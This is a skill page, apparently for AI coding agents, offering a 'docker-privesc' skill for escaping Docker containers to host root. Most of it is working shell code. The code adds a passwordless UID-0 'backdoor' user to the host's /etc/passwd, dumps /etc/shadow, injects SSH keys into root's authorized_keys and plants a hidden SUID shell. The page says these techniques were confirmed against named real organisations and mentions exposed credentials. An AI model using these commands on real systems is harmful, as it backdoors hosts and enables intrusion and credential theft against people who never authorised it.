ワンクリックで
docker-privesc
Escape Docker containers to host root via 5 techniques.
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
メニュー
Escape Docker containers to host root via 5 techniques.
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
4-phase pipeline for max findings per minute across batches.
| name | docker-privesc |
| description | Escape Docker containers to host root via 5 techniques. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3 |
| disable-model-invocation | true |
| metadata | {"tags":["infra","docker","privilege-escalation","container-escape"],"category":"infra","related_skills":["port-service-discovery","api-noauth-hunt"]} |
Docker container escape and privilege escalation — Docker socket abuse, volume mount host takeover, docker group root-equivalence, and prior-privilege-escalation detection. Docker group membership = instant root on the host via 5 distinct techniques. Confirmed on Smart Fit (Docker containers extracted, 12 image layers, privileged mode) and CGE-RJ (Dockerfile + docker-compose.prod.yml exposed in GitLab).
id shows you're in the docker group or have access to /var/run/docker.sock.docker ps or docker info works from within the container.api-noauth-hunt or wordpress-full-compromise achieves RCE in a container./var/run/docker.sock (check: ls -la /var/run/docker.sock).--privileged flag.# Check docker group membership
id | grep docker && echo "[+] Docker group — instant root possible"
# Check docker socket
ls -la /var/run/docker.sock 2>/dev/null && echo "[+] Docker socket mounted — host escape"
# Check privileged mode
cat /proc/self/status | grep -i "seccomp\|cap" && echo "[*] Check capabilities"
| Condition | Escape Method | Command |
|---|---|---|
| Docker group | Volume mount host / | docker run --rm -v /:/host -it alpine chroot /host |
| Docker socket | Create privileged container | docker run --rm --privileged -v /:/host -it alpine |
--privileged | Direct host filesystem access | mount /dev/sda1 /mnt && chroot /mnt |
SYS_ADMIN cap | cgroup release_agent | Write to cgroup notify_on_release |
| No docker, no caps | Check for mounted sockets/pipes | find / -type s 2>/dev/null |
echo "[*] Container escape surface assessment"
# 1. Docker group
echo -n " Docker group: "
if id | grep -q docker; then
echo "YES — instant root via volume mount"
else
echo "no"
fi
# 2. Docker socket
echo -n " Docker socket: "
if ls -la /var/run/docker.sock 2>/dev/null; then
echo "YES — host escape via docker command"
SOCKET_PERMS=$(stat -c "%a %U:%G" /var/run/docker.sock 2>/dev/null)
echo " Permissions: $SOCKET_PERMS"
else
echo "no"
fi
# 3. Privileged mode
echo -n " Privileged: "
if ip link add dummy0 type dummy 2>/dev/null; then
echo "YES — privileged container"
ip link delete dummy0 2>/dev/null
else
echo "no"
fi
# 4. Capabilities
echo " Capabilities:"
grep CapEff /proc/self/status 2>/dev/null
# 5. Mounted volumes (potential host paths)
echo " Mounted volumes:"
mount | grep -vE "^(overlay|tmpfs|proc|sys|devpts|cgroup)" | head -10
# 6. Host processes visible?
echo -n " Host processes: "
PROC_COUNT=$(ls /proc | grep -c '^[0-9]' 2>/dev/null)
echo "$PROC_COUNT visible"
echo "[*] Docker group privesc"
# Technique 1: Volume mount + add user with UID 0
echo "[1] Adding user with UID 0 to /etc/passwd"
docker run --rm -v /etc:/host_etc alpine sh -c \
'echo "backdoor::0:0::/root:/bin/bash" >> /host_etc/passwd'
su backdoor 2>/dev/null
# Technique 2: Volume mount + read shadow
echo "[2] Reading /etc/shadow"
docker run --rm -v /etc:/host_etc alpine cat /host_etc/shadow 2>/dev/null | head -5
# Technique 3: chroot to host root
echo "[3] Chroot to host root"
docker run --rm -v /:/host -it alpine chroot /host bash -c "id && hostname"
# Technique 4: Inject SSH key
echo "[4] Injecting SSH key to host root"
docker run --rm -v /root:/host_root alpine sh -c \
'mkdir -p /host_root/.ssh && echo "YOUR_SSH_PUB_KEY" >> /host_root/.ssh/authorized_keys'
# Technique 5: Create SUID bash on host
echo "[5] Creating SUID bash on host"
docker run --rm -v /usr/local/bin:/host_bin alpine sh -c \
'cp /bin/sh /host_bin/.backdoor && chmod u+s /host_bin/.backdoor'
/usr/local/bin/.backdoor -p 2>/dev/null
echo "[*] Docker socket exploitation"
# If docker client is available in the container
if command -v docker &>/dev/null; then
echo "[+] Docker client available"
# Create privileged container with host root mounted
docker run --rm --privileged --pid=host -v /:/host alpine sh -c \
"chroot /host bash -c 'id && hostname'"
# Alternative: just exec into an existing host container
docker ps # List running containers
docker exec -it <container_id> /bin/bash
fi
# If docker client is NOT available, install it or use the socket directly
if [[ ! -f /usr/bin/docker ]] && [[ -S /var/run/docker.sock ]]; then
echo "[*] No docker client — using REST API via socket"
curl -sk --unix-socket /var/run/docker.sock http://localhost/containers/json | head -20
fi
echo "[*] Checking for prior privilege escalation on host"
# Check sudoers for NOPASSWD entries (docker privesc technique)
echo " NOPASSWD sudoers:"
grep -r "NOPASSWD" /etc/sudoers /etc/sudoers.d/ 2>/dev/null | head -5
# Check for users with UID 0 (injected via /etc/passwd technique)
echo " UID 0 users:"
awk -F: '$3 == 0 {print $1}' /etc/passwd 2>/dev/null
# Check for newly created authorized_keys files
echo " Root SSH keys:"
ls -la /root/.ssh/authorized_keys 2>/dev/null
stat /root/.ssh/authorized_keys 2>/dev/null | grep Modify
# Check for SUID binaries
echo " New SUID binaries:"
find / -perm -4000 -type f 2>/dev/null | while read f; do
if stat "$f" 2>/dev/null | grep -q "Change:.*2026"; then
echo " $f (recently modified)"
fi
done
.git exposed repository.env exposed with MySQL, Redis, SendGrid, OVH S3 credentialsdocker-compose.prod.yml exposed in public GitLab repositoryapt-get update && apt-get install -y docker.io (if internet access).--privileged is rare. Check CapEff mask to see what's available./etc/shadow from host via volume mount.